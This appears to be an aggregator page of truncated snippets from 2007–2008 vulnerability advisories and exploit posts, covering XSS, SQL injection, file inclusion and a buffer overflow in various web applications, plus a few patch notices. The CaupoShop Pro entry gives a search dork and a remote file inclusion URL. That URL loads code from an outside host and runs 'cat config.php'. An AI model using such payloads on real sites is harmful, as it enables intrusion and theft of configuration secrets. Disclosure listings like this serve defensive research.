tomcat examples jsp XSS

Multiple cross-site scripting XSS vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via...

real estate Web site 1.0 - SQL Injection / Cross-Site Scripting

--==+=================== Spanish Hackers Team www.spanish-hackers.com =================+==-- --==+ Real Estate Web Site 1.0 SQL/XSS Multiple Remote Vulnerabilities +==-- --==+====================================================================================+==-- - dreaming of necessity is reaso...

PHP-Address Book <= 3.1.5 (SQL/XSS) Multiple Vulnerabilities

Exploit for unknown platform in category web applications ============================================================ PHP-Address Book = 3.1.5 SQL/XSS Multiple Vulnerabilities ============================================================ ===========================================================...

Apache Tomcat sample web application cross-site scripting vulnerability

Overview Apache Tomcat, from the Apache Software Foundation, contains a cross-site scripting vulnerability in its sample program. Apache Tomcat from the Apache Software Foundation is an implementation of the Java Servlet and JavaServer Page JSP technologies. jsp-examples, a sample web application...

Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow

Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow !-- aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 07-Apr-2008 Software: Tumbleweed Communications - SecureTransport FileTransfer http://www.tumbleweed.com/ Description:...

Office XP Remote SQL Injection

Aria-Security Team Persian Security Network http://forum.Aria-Security.com ENGLISH FORUM! -------------------------------------------------- Shoutz: Aura, Null, Kinglet Office XP Remote SQL Injection Vendor: vso-xp.com Vulnerable File: MyIssuesView.asp Original Adivosry:...

Security fix for the ALT Linux 9 package apache2 version 2.2.8-alt1

Feb. 29, 2008 Aleksey Avdeev 2.2.8-alt1 - 2.2.8: security fixes CVE-2007-6421, CVE-2007-6421, CVE-2007-6422, CVE-2007-6388, CVE-2007-5000, CVE-2008-0005 - Fix 14601: less-than-optimal examples in conf/sites-available. Thanks Mikhail Gusarov &LTdottedmag altlinux org...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in Spyce - Python Server Pages PSP 2.1.3 allow remote attackers to inject arbitrary web script or HTML via 1 the url or type parameter to docs/examples/redirect.spy; 2 the x parameter to docs/examples/handlervalidate.spy; 3 the name parameter to...

CVE-2008-0980

Multiple cross-site scripting XSS vulnerabilities in Spyce - Python Server Pages PSP 2.1.3 allow remote attackers to inject arbitrary web script or HTML via 1 the url or type parameter to docs/examples/redirect.spy; 2 the x parameter to docs/examples/handlervalidate.spy; 3 the name parameter to...

bcoosexoops-xss.txt

bcoos & E-xoops DevTracker module two variables XSS vendor url: http://www.bcoos.net Vendor url: http://www.e-xoops.com Advisore: http://lostmon.blogspot.com/2008/02/ bcoos-and-e-xoops-devtracker-module-two.html vendor notify:yes exploits available: YES bcoos and E-xoops are two content-community...

bubbling-lfi.txt

bubbling library v1.32 multiple Local File Inclusion Vulnerabilities Download scrip : http://sourceforge.net/project/showfiles.php?groupid=192730 Author : Stack-Terrorist v40 Email : [email protected] Home : http://www.v4-team.com for execute exploit does not write extention of file Other files:...

Bubbling Library 1.32 - Multiple Local File Inclusions

bubbling library v1.32 multiple Local File Inclusion Vulnerabilities Download scrip : http://sourceforge.net/project/showfiles.php?groupid=192730 Author : Stack-Terrorist v40 Email : [email protected] Home : http://www.v4-team.com for execute exploit does not write extention of file Other files:...

Bubbling Library 1.32 - Multiple Local File Inclusions

Bubbling Library 1.32 - Multiple Local File Inclusions bubbling library v1.32 multiple Local File Inclusion Vulnerabilities Download scrip : http://sourceforge.net/project/showfiles.php?groupid=192730 Author : Stack-Terrorist v40 Email : [email protected] Home : http://www.v4-team.com for execute...

Easily the jmp esp mode is rewritten to jmp ebx ways-vulnerability warning-the black bar safety net

Reprint: Q version of the hack overflow tutorial book To write this article, I hope to give think I like the beginner buffer overflow rookie some help, because now indeed haven't found a description of such articles. First, the description in stack overflow, our two use—jmp esp and jmp ebx; next,...

1024 CMS 1.3.1 - Local File Inclusion / SQL Injection

vuln.: 1024 CMS 1.3.1 LFI/SQL Multiple Vulnerabilities script info and download: http://www.1024cms.com author: irk4zatyahoo.pl greets to: str0ke, wacky '-----------------------------------------------------------------------------' sql-injection: code: /admin/ops/findip/ajax/search.php: ... 8...

Bitweaver XSS &amp; SQL Injection Vulnerability

HSC Bitweaver XSS & SQL Injection Vulnerability Bitweaver is an open source content management system. Its speed and power are ideal for large-scale community websites and corporate applications, but it is simple enough for non-technical small site users to set up and administrate. It comes fully...

patBBcode 1.0 bbcodeSource.php Remote File Inclusion Vulnerability

No description provided by source. Link to download: http://www.php-tools.net/site.php?file=patBBCode/overview.xml Vuln file: examples\patExampleGen\bbcodeSource.php Vuln code: if !isset $GET'example' die 'No example selected.' ; $exampleId = $GET'example'; obstart; // make the example think it's...

CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability

No description provided by source. ork:allinurl:index.php?action= basket sid vuln:index.php?action= examples: http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php author:[email protected] site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami...

JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ==================================================================== JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability ==================================================================== JobSite Professional v2.0 Remote...

openSUSE 10 Security Update : id3lib (id3lib-4316)

This update fixes a bug that allows local attackers to overwrite arbitrary files. CVE-2007-4460 %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from openSUSE Security Update id3lib-4316. The text description of this plugin...